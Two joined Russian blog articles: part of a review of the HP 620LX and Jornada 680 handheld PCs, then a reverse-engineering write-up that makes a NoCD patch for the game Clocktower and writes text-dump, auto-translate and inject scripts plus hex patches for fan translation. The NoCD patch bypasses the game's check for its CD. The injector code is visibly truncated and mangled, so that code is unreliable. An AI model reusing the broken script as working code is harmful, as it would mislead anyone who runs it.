**Внимание! Не надо снимать эту плату просто так, по приколу! Шлейф клавиатуры очень короткий, так что без последующего демонтажа клавиатуры (что сделать без повреждений ох как непросто) вы замучаетесь искать его правильное положение. Лично мне удалось ровно запихнуть его обратно лишь спустя сорок минут ковыряния девайса с пинцетом и подобными инструментами. Возможно, существует какой-то лучший способ, нежели этот, но никаких Service manual на данный КПК найдено не было (буду рад увидеть правильное руководство по его ремонту, если вдруг кто-то разбирал). Так что лучше просто посмотрите мои фотографии и утолите свой разбирательский зуд.**
Увы, последующие тесты выявили, что порт PCMCIA у данного экземпляра тоже не работает. Так что большая часть описанного ниже была выполнена на КПК другой модели.
❯ HP Jornada 680
----------------
В какой-то степени этот КПК напоминает предыдущий. В некоторых публикациях его даже называли HP 680LX. Тем не менее, в нём мощнее процессор (133 МГц), ОС Windows CE 2.11, а также обновлённый более эргономичный дизайн. Шестнадцать мегабайт памяти тоже никуда не делись. Многим он напомнит HP Jornada 720, но всё же это принципиально иной аппарат.
Представленный на фото аппарат полностью в рабочем состоянии. Имеются штатный стилус, док-станция, проприетарный кабель для COM-порта, карта памяти Compact Flash с софтом.

Корпус выполнен из приятного на ощупь фиолетового пластика. На верхней части логотип HP, а также вставка из серебристого пластика с надписью Jornada. Кнопка, аналогичная той, что мы видели у HP 620LX.

Откроем крышку. Клавиатура совершенно другая (к слову говоря, такая же стоит в Jornada 720), по ощущениям при печати напоминающая таковую у типичного ноутбука нулевых годов (собственно, там стоят не резинки, а полноценный механизм как у клавиатуры ноутбука). Несмотря на то, что клавиши маленькие, печатать на такой клаве одно удовольствие. По удобству использования эта клавиатура — одна из лучших, что устанавливались в клавиатурные КПК. По сравнению с «калькуляторными» кнопочками у HP 620LX это очень большой прогресс.
Также была ликвидирована панель с псевдосенсорными кнопками быстрого запуска, теперь они являются частью клавиатуры. Но устроены они несколько иначе, это чувствуется. Нажатие основных клавиш более чёткое.
Экран стал чуть меньше по диагонали, впрочем, изменение это не такое существенное. Справа всё также небольшая сенсорная панель. Кнопки, правда, поменяли своё назначение.
Кнопка перезагрузки также переехала из отсека резервной батарейки на лицевую часть сверху от клавиши Tab.

Снизу отсек аккумулятора, защёлка для его извлечения, контакты док-станции (их распиновку приведём чуть позже). Слева откидная ножка, справа слот для карт памяти Compact Flash. На нём закрученный на один винтик отсек для резервной батарейки (к слову говоря, крышечка металлическая) и решётка динамика. Отсек открывается весьма необычным образом: придерживая пальцем серую пластиковую вставку, надо надавить на противоположную часть этого слота, после чего он откроется.

Вот так вот выглядит слот в открытом положении. При вставке PCMCIA-карты вся эта конструкция выдвигается из корпуса на полсантиметра, именно для этого и нужна откидная ножка на другой стороне корпуса. Признаться, решение такое мне совершенно не нравится, каждый раз при извлечении карты Compact Flash боишься случайно сломать этот слот.

На передней части (в отличие от HP 620LX, где там ничего нет) отсек для стилуса, кнопки управления диктофоном. Переключателем их можно заблокировать, он тут аппаратный: при блокировке кнопки просто не прожимаются. Также заметны микрофон и индикатор записи. А вот аудиоджека в устройстве нет.

Сам стилус. В отличие от HP 620LX, где для извлечения стилуса используется кнопка, тут надо нажать на клипсу, чтобы эта часть стилуса выдвинулась из корпуса и можно было за неё ухватиться. Точно такой же принцип используется в некоторых шариковых ручках (но под рукой у меня такой не оказалось). Рядом для понимания размеров обычная ручка.

Слева слот PCMCIA, кнопка для извлечения карты, а также окошко ИК-порта.

Справа разъём питания, индикатор зарядки, а также гнездо встроенного модема. Оно для экономии места (как-никак, внутри компактной машинки каждый кубический миллиметр на вес золота (точнее, каждый незанятый кубический миллиметр)) имеет интересную конструкцию: крышка сама является частью разъёма, а провод в девайс вставляется под углом в сорок пять градусов. Считывателем смарт-карт, какой можно встретить в Jornada 720, аппарат не оснащён.

Сзади мало чего интересного — один лишь проприетарный порт для связи с компьютером.

Шнур для COM-порта выглядит так.

А вот и разъём крупным планом.
Распиновка его оказалась такая (это схема кабеля для прямого подключения устройства к компьютеру. Указаны соответственно линии компьютера, а не КПК, соответственно, на другой стороне направление будет противоположное, не перепутайте!):
```
1 Корпус разъёма
2 Не подключён
3 RTS
4 CTS
5 Не подключён
6 GND
7 DCD
7 DSR
8 RX
9 TX
10 DTR
```
Ничего не смущает? Я минут десять тыкал щупами в этот кабель, пытаясь понять, как так-то. Но факт остаётся фактом: DCD и DSR соединены вместе и подключены к одному контакту.

Док-станция. Аппарат достаточно уверенно насаживается на неё, но сидит, увы, не монументально, чувствуется, что он ощутимо болтается. Возможно, это косяк моего конкретного экземпляра. Снизу ничего нет, только четыре ножки, под которыми находятся винты. Кстати, отклеившиеся ножки неплохо садятся на клей B7000…

Порт на док-станции. Сюда втыкается всё тот же проприетарный шнур. В отличие от Jornada 720, USB-порта здесь нет.

Подпружиненные контакты на док-станции крупным планом. Ну и как же без распиновки? Она тут указана такая же, прямого подключения:
```
1 DTR
2 Не подключён
3 RX
4 DSR
4 DCD
5 RTS
6 Не подключён
7 Не подключён
8 TX
9 12 V
10 GND
```
CTS

Разберём док-станцию. Внутри ожидаемо пусто — только две платы, соединённые шлейфиком.

Вся электроника отдельно. Ничего кроме двух островков текстолита, разъёмов, шлейфика и контактной группы здесь нет.
Несмотря на то, что док-станции у HP 620LX и Jornada отличаются, распиновка у них одинаковая. Также соответствуют и кабели. Так что приведённая информация актуальна для всех моделей. У HP Jornada 720 добавляется ещё и USB, на какие контакты он выведен, мне неведомо.
Разбирать сам девайс я не стал — он на пломбе, не хотелось её срывать.
❯ Запуск
--------
Поскольку Windows CE 2.0 и 2.11 имеют схожие интерфейсы, всё далее описанное будет производиться на КПК Jornada 680.

Итак, подаём питание. КПК запускается, а на экране появляется заставка Jornada. У 620LX вместо неё просто логотип HP.

Если резервная батарейка жива, будет предложено сохранить имеющиеся в памяти данные.

А вот и предложение провести первичную настройку. Жмём Enter.

Традиционная для КПК калибровка сенсорного экрана. Тут всё стандартно.

Выбор часового пояса.

Установка времени.

Информация о владельце.

Вот и всё, настройка завершена.

Жмём Enter и попадаем на рабочий стол. Перед этим нас попросят выбрать профиль модема.

А вот и рабочий стол. Здесь немало предустановленных приложений: Word и Excel с кучей функций ~~(сравните с его нынешней мобильной версией, где даже редактирование документов только по подписке)~~, работающий только в режиме прoсмотра PowerPoint, карманный Microsoft Access, календарь, планировщик задач, средство для просмотра изображений, звукозапись и много чего ещё.
❯ Штатный софт
--------------
Немного затронем набор предустановленного софта. Начнём с HP 620LX.




Помимо стандартного мобильного офиса здесь стоят приложения от bSquare, а также менеджер расходов Quicken ExpensAble.





В Jornada к этому набору добавляется софт для модемной связи, программа для назначения функциональных клавиш HP hot keys, HP quick pad, калькулятор OmniSolve.
❯ Связь с ПК
------------
Как нетрудно догадаться, подключение к компьютеру осуществляется через инфракрасный или COM-порт.
Для начала необходимо установить софт, который называется **Microsoft Windows CE Services**. Называвшийся в своей первой версии **Microsoft H/PC Explorer**, он стал по сути предком **ActiveSync**, с которым знаком всякий владелец WM-КПК. Установка данного софта достаточно простая, смысла её документировать я не вижу.

После этого на панели задач появится значок, нажатием на который можно настроить соединение. Есть также галочка выключения его в принципе: так как на этом компьютере помимо этого КПК в COM-порт втыкается ещё много чего интересного, после каждого сеанса связи я её снимаю.

В свою очередь, в «Моём компьютере» появится новый раздел «Mobile devices».

Итак, подключаем аппарат кабелем или насаживаем его на подставку. После этого на нём должна сразу запуститься программа для соединения. Если не запускается — проверяем настройки и качество подключения и при необходимости открываем её вручную (из списка стандартного ПО в меню «Пуск»).

На компьютере тем временем выскочит окошко о том, что найден новый КПК. Можно нажать «Browse», и он откроется без добавления в список.

А вот и он. К слову говоря, если вы сделали Hard reset или забыли поменять батарейки, то определяться как родной КПК перестанет, придётся снести его из этого списка и зарегистрировать снова.

После успешного соединения можно получить доступ ко всему, что есть на устройстве (за исключением системных файлов).
Сразу рекомендую вам найти у себя карту памяти типа Compact Flash. Если у вас её нет — позаимствуйте у товарища. Если и у него нет — пойдите и купите. Использование её существенно расширяет ваши возможности в плане запуска софта, так как позволяет не только не париться с подключением машинки к последовательному порту (учтите, что максимальная скорость всего 57600 бод, так что будьте готовы к тому, что ваши файлы будут передаваться весьма неторопливо), но также и выкрутить на минимум объём оперативной памяти, выделенной под RAM-диск, дабы получить возможность запускать более тяжёлые в плане потребления ОЗУ проги. Система корректно работает даже с картами большого объёма, так что можно будет залить на неё хоть всю вашу коллекцию HPCшного софта.
Вообще, в большинстве моментов кабель с подставкой особо не нужны. Так что можете не бояться приобретать аппарат без них и впоследствии ставить ПО с Compact Flash.
❯ Ставим софт
-------------
Конечно, потыкать штатные проги — интересно, но только один раз. Поэтому разберёмся, где вообще брать программы для КПК на SH-3.
Одним из крупнейших сайтов является hpfactor.com, однако просто так скачивать с него нельзя. Необходимо либо задонатить, либо получить инвайт.
Не стоит окончательно списывать со счетов HPC.ru. Хотя большая часть местных программ рассчитана на Pocket PC, там есть некоторое количество таковых для SH-3.
Также небольшой архив софта я давно нашёл где-то на просторах, ссылку на него дам в конце статьи.
Самым перспективным в этом плане является сайт old-hpc.narod.ru. Вообще, программы там для Windows CE 1.0, но большая часть из них заработает и на наших машинках.
Установка ПО ничем не отличается от таковой на других устройствах под управлением Windows CE. Достаточно просто запустить установочный пакет с расширением \*.CAB или экзешник программы, чтобы установить её или запустить. Для HPC было написано немало софта, хоть и намного меньше, чем под тот же Pocket PC, он же WM.


Начнём с простеньких игрушек. Традиционные сокобан и арканоид есть, конечно, и на этой платформе.

Обязательными к установке приложениями являются TCPMP и Total Commander. Первый — весьма навороченный медиаплеер, второй — «портативная» версия всем известного файлового менеджера.
❯ Can it run Doom?
------------------
Как же без этого-то? Тем более, что на таком КПК сделать это максимально просто. Для этого на Compact Flash создаём папку **HPC Doom**, кидаем туда одноимённый экзешник и \*.WAD-файл.

Далее идём в настройки и подкручиваем объём оперативной памяти.

Запускаем и ждём конца загрузки.

Всё, можно играть. Работает, на удивление, не так уж и плохо, как вначале казалось.
❯ DOS
-----
Под эти КПК был и эмулятор DOS, называвшийся **Pocket DOS**.


Запускается он очень просто — [скачиваем архив](http://old-hpc.narod.ru/prog02.html), распаковываем его на карту памяти. Запускаем экзешник и получаем ошибку о том, что ОС не найдена. Жмём крайнюю левую нижнюю кнопку, выбираем «Drives» и назначаем для диска A: лежащий вместе с экзешником образ **FREEDOS.DSK**. Далее так же открываем «Settings\System» и выбираем там порядок загрузки начиная с диска A:.

Перезагружаемся (в DOS, конечно, а не нажатием кнопки RESET), и всё должно заработать. Безусловно, скоростей как в чистом DOSе ждать тут не стоит, быстродействие тут сравнимо с таковым на PC XT. Тем не менее, у меня заработало намного быстрее, чем у автора того сайта, поскольку аппараты на Windows CE 2.11 куда мощнее первых HPC.
❯ Сеть
------
Так как у нас есть слот PCMCIA, будет странно не попытаться воткнуть туда какую-то карту расширения.

У меня отыскалась вот такая: 3Com EtherLink III. На моё счастье, драйвер для неё отыскался весьма быстро. В комплекте с ним идёт какая-то программа для установки через Windows CE Services, но мы поступим намного проще: просто скопируем нужные DLL-ки в папку Windows.

Втыкаем сетевуху и указываем имя нашего драйвера (без \*.DLL). После этого на панели задач появится значок 3Com, а нам будет предложено настроить наше подключение. Подключаем патч-корд к сетевухе и нажимаем OK. Если всё было сделано правильно, на маршрутизаторе загорится лампочка линка, а КПК получит свой IP-адрес.
Конечно, интернет он сейчас не потянет. Зато можно поднять на своём компьютере FTP-сервер и с удобством перекидывать файлы на КПК и обратно.
❯ Что же с этим делать?
-----------------------
Такие КПК являются уже достаточно редкими артефактами, отчего для многих оптимальным применением будет просто иногда доставать его «на поиграться», чтобы сберечь оставшийся ресурс древней машинки. Тем не менее, помимо продемонстрированного, есть ещё немало того, что можно сделать с устройствами этой серии.
Во-первых, можно попробовать запустить на нём какую-либо альтернативную ОС. Есть такой проект как HPCSH. Это порт NetBSD на КПК с процессором SH-3. В отличие от JLime (порт Linux на HPC HP Jornada) этот проект всё ещё делает вид, что продолжает жить (последняя версия датируется летом прошлого года), а ссылки на официальном сайте NetBSD всё ещё не померли. Увы, сходу запустить его мне не удалось (подозреваю, что проблема в неподдерживаемых Compact Flash, так как, во-первых, с разными картами сыпались разные ошибки, во-вторых, товарищ [dlinyj](https://habr.com/ru/users/dlinyj/) в своём посте про JLime тоже упоминал, что с некоторыми картами работать не будет). Конечно, можно обложиться этими карточками, накачать дистрибутивов и попробовать при помощи приёмов кунг-фу заставить эту ОС завестись, но это уже тема для отдельного поста, который (я надеюсь) тоже когда-нибудь выйдет. Кстати, JLime, хоть и прославился тем, что его запускали на HP Jornada 720, имеет версию и для SH-3.
Во-вторых, можно раздобыть ещё каких-нибудь карт PCMCIA и поиграться с их запуском в Windows CE.
Ну и в-третьих, это просто отличная «печатная машинка», которой приятно не только пользоваться, но и просто держать в руках.
Обе машинки имели свои «расширенные» версии — HP 660LX и HP Jornada 690, отличавшиеся вдвое большим объёмом памяти.

Кстати, процессоры архитектуры SuperH получили применение не только лишь в КПК. У меня отыскалась плата от какого-то видеорегистратора на базе такого чипа (на фото он слегка закрыт кварцевым резонатором).
Такие дела.
❯ Ссылки
--------
* [Софт для SH3 (hpc.7z)](https://mega.nz/folder/sAAxnSbY#-WjxrZ6tc-sbeqyaZzRW7A)
* [HPC.ru](http://hpc.ru/)
* [Ещё куча софта](http://old-hpc.narod.ru/)
* [HPCSH](https://wiki.netbsd.org/ports/hpcsh/)
* [Идеальный клавиатурный КПК Jornada 720](https://habr.com/ru/company/ruvds/blog/530194/)
* [Умели же делать: карманный компьютер HP Jornada из 1998 года](https://habr.com/ru/company/selectel/blog/682906/)
* [КПК HP Jornada 680 на Windows CE](https://www.youtube.com/watch?v=SLiH4xC4pKw)
* [Машина моей мечты](http://www.handy.ru/read/review/jornada680.html)
[](https://timeweb.cloud//vds-vps?utm_source=habr&utm_medium=banner&utm_campaign=vds-promo-6-rub) | https://habr.com/ru/post/706016/ | null | ru | null |
# Взлом игры Clocktower — The First Fear
Давайте возьмём отличную японскую игру в жанре survival horror, разберёмся, как она работает, переведём её на английский и сделаем с ней ещё кое-что.
Введение
--------
ClockTower (известная в Японии как Clocktower — The First Fear) — это игра, изначально выпущенная Human Entertainment для Super Nintendo.

Это одна из игр жанра «point and click adventure», но она также стала одним из основателей жанра survival horror. Сюжет заключается в том, что четыре сироты после закрытия приюта попали в особняк, в котором один за другим начали исчезать. Игрок управляет одной из сирот, Дженнифер, и пытается найти выход, своих друзей и выяснить, что же происходит в особняке.
Атмосфера игры сурова, события в доме происходят случайно, без какой-либо видимой причины (проще говоря, дом заколдован), иногда что-то может убить вас просто так, психопат с садовыми ножницами преследует вас по всему дому (Немезис из Resident Evil 3 был не первым таким персонажем):

В игре часто возникают опасные ситуации, требующие быстро думать, единственное спасение — выживать, убегать и прятаться, но также важно сохранение рассудка Дженнифер, иначе она может упасть и умереть от сердечного приступа (в стиле игры Illbleed).
Игра была выпущена в 1994 году на SNES, повторно выпущена с расширенным контентом на PSX в 1997 году, выпущена на консоли Wonderswan (но никого не волнует Wonderswan), и, наконец, вышла на PC (а потом перевыпущена для PC в 1999 году).
Да, для ROM под SNES группой Aeon Genesis выпущен английский перевод (кажется, это были они), но версия для SNES хуже версии для PC, у которой был гораздо лучший звук, есть вступительный FMV-ролик и т.д. Возможно, единственной версией с бОльшим количеством контента была версия на PSX, но о ней мы поговорим позже.
Для начала давайте «отучим» игру от CD!
Часть 1 — Исследование
----------------------
У нас есть папка с игрой, которая выглядит так:

У нас есть папка BG, внутри которой находится что-то похожее на фоны комнат в разрезанном формате с сопровождающими файлами .MAP, который, как я предполагаю, размещает разные фрагменты на экране:

У нас есть папка DATA, содержащая файлы PTN и PYX… пока не знаю, что это такое… возможно, они связывают экраны уровней с логикой, или что-то подобное.
Также есть папка FACE, в которой содержатся bmp с лицами людей, используемыми в диалогах:

Ещё есть папка с предметами, которые может использовать Дженнифер:

В папке PATTERN содержатся файлы ABM. Думаю, они используются для спрайтовых анимаций, но могу ошибаться.
В папке SCE находятся два файла: CT.ADO и CT.ADT. Мы рассмотрим их — это логические скрипты действий, происходящие на протяжении всей игры, написанные на собственном бинарном скриптовом языке… и на них мы потратим больше всего времени.
В папке SNDDATA лежат файлы MIDI и WAV музыки и звуковых эффектов.
Папка VISUAL содержит все рендеры высокого разрешения, опции меню и т.д. в формате BMP. Также здесь хранится вступительное видео.

Наконец, у нас есть файл DATA.BIN, который… не знаю пока, что делает. Кроме того, есть исполняемый файл игры ct32.exe.
Запустив игру без CD, получаем следующее сообщение:

Запустим игру в отладчике, чтобы найти эту строку. Выясняется, что она просто сообщает, что игра не знает, где находятся данные игры (т.е. не вставлен CD).
Часть 2 — Создаём NoCD
----------------------
Посмотрев в IDA, мы видим, что используется RegQueryValueEx, то есть считывается значение реестра. Что же игра оттуда получает?

Ну… полагаю, вот и ответ.
ХОТЯ СТОП.
Давайте проверим, что её вызывает, возможно, мы сможем жёстко задать это в коде:

Похоже, что дополнительный труд оказался ненапрасным! Игра ищет аргумент NOREG. Если она не находит его, то проверяет значение реестра, пропускает проверку и запускает игру, предполагая, что находится в родительском каталоге. Здесь нам поможет простой патч, который заставит игру думать, что она всегда запускается с аргументом NOREG. Для этого заменим jz на 0xEB (или безусловный JMP).
Запускаем и получаем:

ДА!
Часть 3 — Ищем внутриигровой текст
----------------------------------
Подумаем немного — можно ли ожидать, что весь текст находится в исполняемом файле? Ну, это возможно, во многих играх так и бывает. В двоичных файлах есть даже несколько статичных строк (например, найденная нами ошибка об отсутствии CD), но у меня есть ощущение, что тексты спрятаны где-то в другом месте (может, в файлах DATA?). Давайте посмотрим:

Японский текст, использующий формат SHIFT-JIS (очень популярный), обычно начинается с управляющего символа в диапазоне 0x80-0x8F… Неплохо бы начать с поиска чего-то подобного в исполняемом файле.
Затем мы скопируем эти строки в новый файл и откроем в notepad++, а потом вставим в Google Translate:

Так, это напоминает сообщения об ошибках, а не игровые диалоги. Пора искать другие файлы!

Хм, понятно — в файлах PTN и PYX нет никаких текстов. Давайте проверим папку SCE.

Похоже, что в файле CT.ADT находятся четырёхбайтные смещения (они до конца файла выполняют счёт вверх от 0x100, по 4 байта за раз).
Зато в файле CT.ADO…


Мы что-то нашли… здесь не только строки ASCII, похожие на пути к файлам, но и текстовые строки в формате SHIFT-JIS. Данные в этом файле выглядят странно… давайте посмотрим, сможем ли мы разобраться в них лучше. Нам придётся, если мы хотим их парсить.
Часть 4 — Углубляемся в ADO/ADT
-------------------------------
Мы уже немного разобрались в том, как работает ADT, так что давайте посмотрим, как выглядит ADO:

В самом верху начинается магия (ADC Object File), потому куча 0xFF для смещения на 256, потом, похоже, начинаются данные. Настало время подумать, как настоящий учёный-компьютерщик!
У нас есть все эти строки, двоичный формат без очевидного поиска, кроме, возможно файла ADT. Внутри должен быть управляющий код, перемешанный с данными, который даёт игре понять, что она видит при парсинге… у всего этого есть какая-то структура.
Изучая строки с .BMP, можно заметить, что они имеют одинаковый шаблон:
За 39FF следует нулевое двухбайтное значение (чаще всего, но иногда это 0x0100, поэтому я думаю, что это значение в WORD), затем строка ASCII, завершающаяся нулевым значением, и отступ. На самом деле при каждой загрузке BMP для FACE, перед ней стоит значение 0xFF39!
Давайте проверим исполняемый файл:

Здорово! У нас есть не только это, но и другие значения. Давайте проверим несколько строк Shift-JIS, чтобы проверить, сможем ли найти закономерность:

Отлично! Все строки начинаются с 0xFF33, имеют два 16-битных значения (0x0F00), за которыми идёт строка в Shift-JIS.
**Примечание:** можно заметить, что SHIFT-JIS НЕ завершается нулевым значением, это невозомжно. Некоторые программы могут обрабатывать и однобайтовые и многобайтовые символьные значения, но в старых программах это было серьёзной проблемой. В результате, как можно заметить, за всеми разрывами строк (0x0a) следуют 0x00. На самом деле за ВСЕМИ символами ASCII здесь идёт 0x00 (и числа или английские буквы). Таким образом рендеринг текста может поддерживать многобайтовую интерпретацию символов ASCII (0-127) и не перепутать при считывании байт данных с управляющим байтом, и наоборот.
Поэтому мы приходим к выводу, что логика игры должна парсить строку, пока каким-то образом не обнаружит конец (возможно, найдя новый опкод (обычно это 0x28FF).
Итак, как мы знаем, файл ADO забит скриптовыми «опкодами» и следующими за ними данными. Можно теоретически предположить, что игра считывает их и на основании предшествующего опкода знает, какие данные нужно ожидать. Теперь мы можем посмотреть на конструкцию switch в исполняемом файле, которую мы нашли выше (со всеми case), чтобы выделить все опкоды, используемые в игре (для более полного понимания формата).
Мы заметим значения (0xFF20, 0xFF87) и будем искать их в файле ADO, определяя, имеют ли они то же количество байт данных перед следующим опкодом. Попробуем выяснить, являются ли они двухбайтными значениями, строками и так далее.

Кроме того, можно заметить, что в исполняемом файле есть довольно интересный текст:

На самом деле это список, и он подозрительно похож на названия опкодов. К счастью для нас, так и есть! Теперь мы знаем названия опкодов.

На этом этапе мы можем запустить игру с отладчиком и прерывать выполнение на конструкциях, чтобы наблюдать за действиями разных опкодов. Один из интересующих нас — это JMP…
На самом деле, после первого JMP (0xFF22) есть двухбайтовое значение 0x17.
Если наблюдать за ним в игре и установить в IDA в качестве наблюдаемой переменной ADO\_offset, то можно увидеть, что игра переходит от этого значения к 0x1B32. Как она узнаёт, что нужно это сделать? Это не множитель… наверно:

Ага!
0x17 \* 4 = 0x5C, то есть ADT — это таблица переходов для разных сцен. Вы заметите, что функция CALL (0xFF23) работает похожим образом, но через какое-то время возвращается к этому смещению… Первые несколько смещений ADT указывают на 0xFF00. Похоже, это очень важно в игре, переходы на самом деле пропускают их (они прибавляют +2 к смещению после перехода). Это что-то вроде опкода RETN? Думаю, что да.
Однако вы заметите, что файл ADT содержит в конце разные значения, намного превышающие размер файла ADO. Что они дают? Мы с этим разберёмся, но сначала немного подробнее рассмотрим процесс выполнения игры, чтобы понять, как работают эти переходы (уделив им особое внимание).

Сделав дамп памяти, можно заметить, что файл объектов ADC в памяти (CT.ADO) имеет значение 0x8000 int16, записанное в каждых 0x8000, или 32 КБ. Кроме этого ADO никак не изменён. Можно также заметить в исполняемом файле, что функция парсит значения и пропускает два байта, если видит это значение (как NOP).

Поскольку игра разделяет данные на фрагменты по 32 КБ (скорее всего, чтобы более сегментированно обращаться к памяти; мы часто встречались с двухбайтными значениями — это важно), то для ADT должна быть какая-то трансляция адресов (потому что ADT использует для обращения к смещению 4 байта).

Здесь довольно много математики, которая, если вы наблюдали в отладчике, будет напоминать что-то такое:

Сначала я не нашёл функцию и дошёл до конца файла ADT, предполагая, что есть указатель на конец файла ADO (последний RETN имеет смещение 0x253F4). В списке ADT он указан как 0x453F4. Поискав разные другие адреса, я заметил, что трансляция берёт два значимых байта, делит их пополам и вставляет обратно в конец.
Неплохо, теперь мы можем генерировать файлы ADT (обратной операцией: умножением самого значимого в зависимости от того, сколько интервалов по 0x8000 мы прошли). Также у нас есть общая схема опкодов и мы знаем, где находятся строки. Прежде чем заняться дизассемблированием, давайте посмотрим на награду и приложим все усилия (сначала перевод).
Часть 4: настала очередь CTTDTI
-------------------------------
Мы знаем, в каком формате хранятся строки и как считать их из файла ADO. Разумеется, вставка их обратно потребует изменения смещений ADT, потому что размеры строк могут быть гораздо больше или меньше. Для начала рассмотрим вырезание строк ADO в текстовый файл, во что-то очень легко редактируемое, что можно будет потом считать другой программой. Создадим формат, в котором мы сможем легко вставлять строки в новый файл ADO и удобно изменять смещения. Что нам для этого понадобится?
Итак, нам важно смещение, с которого начинается строка, размер исходной строки в байтах, затем сама строка, что-то вроде:
```
0xE92 25 blahblahblah
```
Пишем cttd.py:
```
'''
CTD - Clocktower Text Dumper by rFx
'''
import os,sys,struct,binascii
f = open("CT_J.ADO","rb")
data = f.read()
f.close()
g = open("ct_txt.txt","wb")
for i in range(0,len(data)-1):
if(data[i] == '\x33' and data[i+1] == '\xff'):
#Нам нужно пропускать 6 из-за опкодов и значений, изменения которых нам не важны.
i+=6
str_offset = i
str_end = data[i:].index('\xff') -1
newstr = data[i:i+str_end]
strlen = len(newstr)
newstr = newstr.replace("\x0a\x00","[NEWLINE]")
#Игра ставит нули после каждого символа ASCII, нам нужно удалить их.
newstr = newstr.replace("\x00","")
g.write("%#x\t%d\t" % (str_offset,strlen))
g.write(newstr)
g.write("\n")
g.close()
```
Я переименовал CT.ADO в CT\_J.ADO, чтобы потом сгенерировать новый файл.
Эта программа считывает файл ADO, находит 0xFF33, пропускает 6 байтов (чтобы обойти опкод и два двухбайтных значения), а затем записывает в новый файл начальное смещение строки, длину строки и саму строку в формат с разделителями табуляцией, завершающийся новой строкой.
Вы заметите, что я заменяю все значения 0x0a (новая строка) на [NEWLINE]. Я делаю так потому, что хочу, чтобы вся строка обрабатывалась в одной строке и я мог определять новые строки там, где хочу, не изменяя формат текстового файла.
Ради интереса давайте сделаем что-нибудь глупое: мы спарсим этот текст с помощью translator. Это модуль Python, загружающий данные в Google Translate, автоматически распознающий язык, переводящий и возвращающий текст на нужном языке:
cttt.py:
```
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
Clocktower Auto Translator by rFx
'''
import os,sys,binascii,struct
from translate import Translator
translator = Translator(to_lang="en") #Set to English by Default
f = open("ct_txt.txt","rb")
g = open("ct_txt_proc2.txt","wb")
proc_str = []
for line in f.readlines():
proc_str.append(line.rstrip())
for x in range(0,len(proc_str)):
line = proc_str[x]
o,l,instr = line.split("\t")
ts = translator.translate(instr.decode("SHIFT-JIS").encode("UTF-8"))
ts = ts.encode("SHIFT-JIS","replace")
proc_str[x] = "%s\t%s\t%s" % (o,l,ts)
g.write(proc_str[x]+"\n")
#for pc in proc_str:
# g.write(pc)
g.close()
```
Теперь давайте попробуем пару строк с инъектором — последняя программа в этом пакете парсит текстовый файл, добавляет отбивку нулями ко всем символам ASCII в строках, считывает строки в словарь, чтобы мы знали, какие смещения задействуются. Кроме того, он воссоздаёт ADO с нуля (он считывает ADT, загружает все «сцены» в массив с их смещениями, копирует все данные между строками и после них), а затем повторно генерирует ADT на основании размеров «сцен» ADO:
ctti.py:
```
'''
Clocktower Text Injector by rFx
'''
import os,sys,struct,binascii
def is_ascii(s):
return all(ord(c) < 128 for c in s)
def get_real_offset(offset):
#Получаем верхнее значение
high_val = offset & 0xFFFF0000
high_val /= 2
low_val = offset & 0xFFFF
return high_val+low_val
def get_fake_offset(offset):
#Получаем верхнее значение
mult = int(offset / 0x8000)
shft_val = 0x8000 * mult
low_val = offset & 0xFFFF
return offset + shft_val
f = open("CT_J.ADO","rb")
data = f.read()
f.close()
offset_vals = []
adt_list = []
newdata = ""
f = open("ct_txt_proc.txt","rb")
lines = f.readlines()
o,l,s = lines[0].split("\t")
first_offset = int(o,16)
o,l,s = lines[0].split("\t")
last_offset_strend = int(o,16) + int(l)
newdata = data[:first_offset]
for i in range(0,len(lines)):
line = lines[i]
offset, osl, instr = line.split("\t")
offset = int(offset,16)
instr = instr.rstrip('\n')
instr = instr.replace("[NEWLINE]","\x0a")
#Исправляем символы ASCII.
instr = instr.decode("SHIFT-JIS")
newstr = ""
for char in instr:
if(is_ascii(char)):
newstr+=char+'\x00'
else:
newstr+=char
instr = newstr
instr = instr.encode("SHIFT-JIS")
newstrlen = len(instr)
osl = int(osl)
strldiff = newstrlen - osl
#Заменяем данные
if(i < len(lines)-1):
nextline = lines[i+1]
nextoffset,nsl,nstr = nextline.split("\t")
offset_vals.append({"offset":offset,"val":strldiff})
nextoffset = int(nextoffset,16)
newdata += instr+data[offset+osl:nextoffset]
else:
offset_vals.append({"offset":offset,"val":strldiff})
newdata += instr + data[offset+osl:]
#Конец последней строки до EOF
f.close()
#Записываем новый файл ADO.
g = open("CT.ADO","wb")
g.write(newdata)
g.close()
#Исправляем файл ADT.
f = open("CT_J.ADT","rb")
datat = f.read()
f.close()
g = open("CT.ADT","wb")
for i in range(0,len(datat),4):
cur_offset = get_real_offset(struct.unpack(" offset["offset"]):
final\_adj += offset["val"]
g.write(struct.pack("
```
Проверим, как он работает:

Отлично!
Английский язык будет довольно ужасным, к счастью, я нашёл на фан-форуме Clocktower файл rtf с переводом и смог вручную отредактировать строки на основании грубых переводов.

Всё переведено и готово к работе! Давайте запустим:

Чёрт возьми!
Что-то не так, давайте забросим файл в IDA и посмотрим, что происходит:


Похоже, что мы считываем файл ADO в память, но он пытается использовать указатель и не может, потому что в этом месте ничего нет.

Понаблюдаем за struct a1 и за выполняемыми ею malloc, наверно, проблема в этом. Покопавшись подольше, мы выясним, что эти указатели создаются здесь:

То есть игра (на основании опкода cmp5) создаёт указатели только для фрагментов ADO 5 \* 0x8000, но считывает данные ADO до EOF (это определённо ошибка). В результате мы можем загрузить файл ADO размером не более 0x28000. Остановит ли это нас? Конечно нет! Давайте подробнее изучим структуру SCE в памяти…
Мы можем изменить все случаи загрузки указателей ADO с 5 на 6, чтобы добавить ещё один указать, но что будет после этого последнего указателя? Конечно же, начнутся смещения ADT

Мы видим, что смещение ADT 0x00 находится по адресу struct\_head + 0x2A и переходит на 0x7D0… серьёзно? Указетели на 0x7D0??? Постойте, это похоже на 0x8000.
В результате у нас есть только 0x4800 байт для файла ADT. Можно сказать, что снизив начальный индекс ADT до, скажем, 0x2E, мы получим в четыре раза больше байт для записи ещё одного указателя ADO и у нас ещё останется куча свободного места в конце!
Находим ссылки struct на 0x2A и меняем их тоже на 0x2E:

Да! Люблю объектно-ориентированный реверс-инжиниринг.
Отлично, теперь игра полностью переведена. Что дальше?
Нам надо внести двоичные изменения в CT32.exe с помощью шестнадцатеричного редактора:
```
529B: 74 EB
BC7B: 2A 2E
BC8D: D0 CC
BD35: 2A 2E
BD62: 2A 2E
D4DA: 2A 2E
D4FC: 2A 2E
DA58: 2A 2E
DA79: 2A 2E
103DA: 2A 2E
10407: 2A 2E
104F8: 2A 2E
105BB: 2A 2E
105E8: 2A 2E
10703: 2A 2E
10730: 2A 2E
115FA: 2A 2E
116B2: 05 06
116E8: 05 06
